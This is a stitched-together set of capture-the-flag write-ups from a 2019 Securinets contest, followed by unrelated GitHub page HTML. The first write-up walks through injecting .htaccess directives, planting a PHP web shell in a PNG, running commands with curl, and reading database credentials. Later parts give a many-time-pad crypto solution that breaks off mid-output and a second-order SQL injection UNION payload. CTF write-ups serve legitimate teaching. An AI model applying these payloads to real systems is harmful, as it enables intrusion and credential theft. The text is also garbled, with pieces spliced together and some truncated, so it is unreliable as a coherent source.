>Find out the Mysql credentials and search the flag from the database.
>Link: https://web3.ctfsecurinets.com/
**Hint (pinned on Web channel from Discord):**
>Hint 1 for Unbreakable Uploader: try Action deny, target all on the begining
### Write-up
When we visit the task page we get this
We have two ways, trying to upload an Image file or trying to add or remove a restriction.
The second way seems useless actually.
So we tried to exploit an upload vulnerability but whatever my file, the application is very smart and detect my PHP files whatever my bypassing method even if I upload a PHP file renamed as a PNG file. Only JPEG and PNG files are allowed. And I think this is why the task was called `Unbreakable Uploader`.
So, maybe should we exploit another vulnerability from the second part of the task (Restrictions Form).
The first hint was to use Deny as an action and an `all` as a target. After that we opened an image
When, we opened an image, we get a Forbidden response
This means that our all IP address were denied.
It seems that there is an ACL feature to deny and allow targets.
Also, the web server is Apache/2.4.25. Maybe the ACLs are written on .htaccess file ?
We tried to write the target and then I added a new line to add another .htaccess entry. But I failed several time until I got the greatest idea:
>Keep it simple
If I need a new line, let me write simply a new line. So I edited the target `<input>` as a `<textarea>` (Ctrl+Maj+I from Chrome browser, then Ctrl+Shift+C and click on the target input)
I changed `input` to `textarea`
Then, I can write easily new lines.
The first test I did to check if new lines works and at the same time I can check if we can trigger an error inside .htaccess file
Target:
```testtest2```
And so we got only `Allow test`. The new created line `test2` was not there.
And as we expected, we triggered a .htaccess error while opening an existing image
We understood why is there a button `I screwed-up everything and I want to reset the task`.
Because we really screwed-up the .htaccess file and we need to reset it.
But, if we only upload PNG and JPEG real files and we can modify .htaccess and bypass editing retrictions from it to add new entries, how can we solve this task and get access to the database ?
After a quick search on internet, we found some documents talking about hardcoding php code inside PNG files that we can execute system commands using HTTP parameters based on this injected code ``
>Reference: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
The creator of this technique was really a genious.
We downloaded the existing exploit [xsspng.png](resources/web-1000-unbreakable_uploader/xsspng.png).
Then, we uploaded that PNG file and it was successfull since it was a real PNG file.
We figured out thatwe should change PNG file types using .htaccess so that PNG files will be executed as PHP files.
>Source: https://security.stackexchange.com/a/122937
So, we will use this value as a `target` value
```testAddType application/x-httpd-php .pngAddHandler application/x-httpd-php .png```
It looks great
And also the uploaded PNG image is not displayed as a PNG file
Now, we are going to exploit the RCE using this command
``curl -i -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=id"``
And we got a nice result
Now, let's find out the database credentials a step by step.
We get the current location
``curl -i -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=pwd"``
So this is a Symfony project. A quick search on google gives up where we can find the database credentials from configuration files.
If the `.env` file exists, if should be there. Otherwise it should be on `app/config/parameters.yml`.
So let's check the project document root
``curl -i -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=ls ../../../ -lA"``
`.env` file exists. So let's cat it
``curl -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=cat ../../../.env"``
So we got:
```Mysql DatabaseHostname: localhostUsername: symfony_adminPassword: Securinets_dB_P455W0Rd_369Database: symfony_task_3```
In this task, mysqldump will not work. Maybe because of the database that was very big or because of user privileges. So we need to searh the flag inside the database step by step.
Let's show database tables:
```curl -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=mysql -usymfony_admin -pSecurinets_dB_P455W0Rd_369 -hlocalhost --database symfony_task_3 -e 'show tables'"```
But this strangely will not work.
We tried to go back and retrieve database names maybe we did something wrong
```curl -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=mysql -usymfony_admin -pSecurinets_dB_P455W0Rd_369 -hlocalhost -e 'show databases'"```
Clear Output:
```Databasebig_databaseinformation_schema```
So the database name that we found on the configuration file `symfony_task_3` was a fake name and instead we should use `big_database`.
Let's list its tables
```curl -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e6448370067d5.png?0=shell_exec" -d "1=mysql -usymfony_admin -pSecurinets_dB_P455W0Rd_369 -hlocalhost --database big_database -e 'show tables'"```
Clear output:
```Tables_in_big_databaseuser_details```
And finally we search the flag on that `user_details` table
```curl -X POST "https://web3.ctfsecurinets.com/uploads/9b3aa7a5c5cebd1318e79442144ffa63/18abe44ac4242278ad0e64d5.png?0=shell_exec" -d "1=mysql -usymfony_admin -pSecurinets_dB_P455W0Rd_369 -hlocalhost --database big_database -e 'select * from user_details' | grep Securinets"```
Clear output:
```69069 paul47 brown morris fl46 Securinets{T00_MuCh_W0rk} 1```
So, the flag is `Securinets{T00_MuCh_W0rk}`.
___
# Scoreboard
This is the tasks list released on the CTF:
And, this is the scoreboard and the rankin for the 100/436 teams that they solved at least one task in this CTF :
If you need the Json file of the scoreboard, you can find it [here](scoreboard/score.json)
|
# Useless admin
__PROBLEM__
One member of our team, piece of sh#t an#s_boss, made a huge mistake using multi time pad.
He knew that the OTP, if it is well applied, it is unbreakable. But this usesless brainless retard, went yoloooo.
Not only that, but he deleted the original plain text, so we are screwed.
The only thing left is the following file : cipher.json
It contains multiple cipher text, created using OTP and the same key.
So can you figure out the plain text of the cipher_flag ?
Flag format : Securinets{plain text here}
Author:BlueWhale
[cipher.json](https://www.ctfsecurinets.com/files/bbfe31808617c8c67fd9da96f1daa8bd/cipher.json)
__SOLUTION__
Okay so this is like super xor attack or something :smile:
The best part about this is that I didn't had to do anything because this is common know problem and someone already have created a great [script](https://gist.github.com/intrd/a12e1bb564b1825e864efa2ebeb37874)
I just had to make few changes to it.
First this is what the json data looked.
```json➜ http https://www.ctfsecurinets.com/files/bbfe31808617c8c67fd9da96f1daa8bd/cipher.json | jq .{ "cipher_list": [ "1b0605000e14000d1b524802190b410700170e10054c11480807001806004e4f1f4f01480d411400531158141e1c100016535a480c000c031a000a160d421e004113010f13451e0c0100100a020a1a4e165f500d0c1e041a090b001d0515521c0a0410000a4f4b4d1d1c184d071600071c0a521d1706540940", "1e10524e001f11481c010010070b13024f0704590903094d0c000e4f0711000615001911454217161a1a45040149000a5218404f1e0012060b1b590a1048171741140c01174c0d49174f0c8d4fc7520211531b0b0c1e4f", "1d0c04451352001a000154431b014109450a0a0b000045490403520a1d16490008535848085942071c0d0c57101c0045111c40430c4e111c0b1b1c451d4f071712010508475518061d00060a1b0a1a4c165d", "160d074300061d071b524e06190b134e450a0b0a4d4c12411d004f014045491b4649074804001100011d4504520612451e165d53064e164e1d060d0d44541a0041031b0b06540d1a070004001d4b074800531c04101d4f", "1a1d524912521548120045021b4e1506490a0859150345531d12521b4e094909030003011148420453074d161e05540b071e4c451b000a084a1d1c04084c0b45060b060a4742070618534218070210484512020043100e191e5956111a1c001c1f0b5c", "1a1d5248000154041a1c47430d0b04000005015900140c4f04534f094e08490103000000045442111b11001b1b1d000917535a48004e021d4a0e0b0044491c03080a001a024c11490748074f02040054451a1d150c1b150d020d0e", "1a1d5249125215481613500a1b0f0d4e4d0d1c0d000700001d1c001b06004f1d0f5a11480745040a011100181c0c540d13000e44085404404a061716014e010c0308104e084e0d4911450506011853540a5304120a1a154c0a1843001b45541c481607051b431f480d001e0400000c531d01011d00124441010200190d0800000000000e54060001100a1b4d0b040d105347", "0a0607000913020d551300041d0f0f0a0003061f154c034f1b53530602004e0c030c541f0454110a1d5a001e0649190419165d00104f104e1b1a101101001b0b1705051b0642040c5341114f0e4b104f0803110b0a060f42", "160d074300061d071b524e06190b134e450a0b0a4d4c12411d004f014045491b4649074804001100011d4504520612451e165d53064e16424a1810110c00060d04440e1c02411c0c00544209001953540d165009021a1542", "1e10524e001f11481c010010070b13024f0704590903094d0c000e4f0711000615001911454217161a1a45040149000a5218404f1e0012060b1b590a1048171741140c01174c0d49174f4201001f534b0b1c074b", "1a49134d4113540a0713490d434e160f541700174f4c11480c53520a1d1100000000190d4549114512544d12000c540402034b4e0d491d40" ], "cipher_flag": "1a4905410f06110c55064f430a00054e540c0a591603174c0d5f000d1b110006414c1848164516111f1100111d1b54001c17474e0e001c011f1d0a4b"}```
After using the [cipher.py](cipher.py) we get the output:
```bash➜ python2 cipher.pyFix this sentence:* *anted to ind t** y*rl*, but i'*l*settle for endin* ****s.
Fixed:cure let me be know a
('key is', 'y |
# Injections
Every parameter except session[‘username’] in queries was escaped with mysqli_real_escape.This parameter was used for querying all posts of logged user.When registering a new acc it was set to mysqli_real_escape_sgtring($_POST[‘uname’]),although when logging in it was set to username from db which is unescaped.
When viewing posts only 3 values were passed to html tough - title, content, authortable columns were ordered this:``` | id | title | content | date | author | ```and the query was``` "SELECT * FROM posts WHERE author = '". $_SESSION['username'] ." ```so I had to register new account whith username``` ' UNION SELECT 1, password, login, 4, 5 where role=1 -- asdf```when registered, session[‘username’] was set to escaped value of usernameso i had to relog. Then it was set to unescaped, clicking onto view posts,username and password of admin showed up yay - |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>ctf/2019/Securinets/rev at master · acdwas/ctf · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="EBBE:F966:16598E9:16EEFC7:64122518" data-pjax-transient="true"/><meta name="html-safe-nonce" content="78885008103164af566f6638b17db5e62bdcd80b061bb9196dedb5b12e4d25a2" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJFQkJFOkY5NjY6MTY1OThFOToxNkVFRkM3OjY0MTIyNTE4IiwidmlzaXRvcl9pZCI6IjkwMjcyNTcwMjg1NzAxMjk2ODgiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="f8ab88136749479910339d37dc94964fa62a0409c76775730f33b7b2373307e5" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:124655323" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="Contribute to acdwas/ctf development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/9b98b72adb831b3851b01805511beba058a5c295fb1ddd78c19386b02ddab30b/acdwas/ctf" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="ctf/2019/Securinets/rev at master · acdwas/ctf" /><meta name="twitter:description" content="Contribute to acdwas/ctf development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/9b98b72adb831b3851b01805511beba058a5c295fb1ddd78c19386b02ddab30b/acdwas/ctf" /><meta property="og:image:alt" content="Contribute to acdwas/ctf development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="ctf/2019/Securinets/rev at master · acdwas/ctf" /><meta property="og:url" content="https://github.com/acdwas/ctf" /><meta property="og:description" content="Contribute to acdwas/ctf development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/acdwas/ctf git https://github.com/acdwas/ctf.git">
<meta name="octolytics-dimension-user_id" content="17169107" /><meta name="octolytics-dimension-user_login" content="acdwas" /><meta name="octolytics-dimension-repository_id" content="124655323" /><meta name="octolytics-dimension-repository_nwo" content="acdwas/ctf" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="124655323" /><meta name="octolytics-dimension-repository_network_root_nwo" content="acdwas/ctf" />
<link rel="canonical" href="https://github.com/acdwas/ctf/tree/master/2019/Securinets/rev" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
<div class="HeaderMenu--logged-out p-responsive height-fit position-lg-relative d-lg-flex flex-column flex-auto pt-7 pb-4 top-0"> <div class="header-menu-wrapper d-flex flex-column flex-self-end flex-lg-row flex-justify-between flex-auto p-3 p-lg-0 rounded rounded-lg-0 mt-3 mt-lg-0"> <nav class="mt-0 px-3 px-lg-0 mb-3 mb-lg-0" aria-label="Global"> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Product <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 d-lg-flex dropdown-menu-wide">
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-workflow color-fg-subtle mr-3"> <path d="M1 3a2 2 0 0 1 2-2h6.5a2 2 0 0 1 2 2v6.5a2 2 0 0 1-2 2H7v4.063C7 16.355 7.644 17 8.438 17H12.5v-2.5a2 2 0 0 1 2-2H21a2 2 0 0 1 2 2V21a2 2 0 0 1-2 2h-6.5a2 2 0 0 1-2-2v-2.5H8.437A2.939 2.939 0 0 1 5.5 15.562V11.5H3a2 2 0 0 1-2-2Zm2-.5a.5.5 0 0 0-.5.5v6.5a.5.5 0 0 0 .5.5h6.5a.5.5 0 0 0 .5-.5V3a.5.5 0 0 0-.5-.5ZM14.5 14a.5.5 0 0 0-.5.5V21a.5.5 0 0 0 .5.5H21a.5.5 0 0 0 .5-.5v-6.5a.5.5 0 0 0-.5-.5Z"></path></svg> <div> <div class="color-fg-default h4">Actions</div> Automate any workflow </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-package color-fg-subtle mr-3"> <path d="M12.876.64V.639l8.25 4.763c.541.313.875.89.875 1.515v9.525a1.75 1.75 0 0 1-.875 1.516l-8.25 4.762a1.748 1.748 0 0 1-1.75 0l-8.25-4.763a1.75 1.75 0 0 1-.875-1.515V6.917c0-.625.334-1.202.875-1.515L11.126.64a1.748 1.748 0 0 1 1.75 0Zm-1 1.298L4.251 6.34l7.75 4.474 7.75-4.474-7.625-4.402a.248.248 0 0 0-.25 0Zm.875 19.123 7.625-4.402a.25.25 0 0 0 .125-.216V7.639l-7.75 4.474ZM3.501 7.64v8.803c0 .09.048.172.125.216l7.625 4.402v-8.947Z"></path></svg> <div> <div class="color-fg-default h4">Packages</div> Host and manage packages </div>
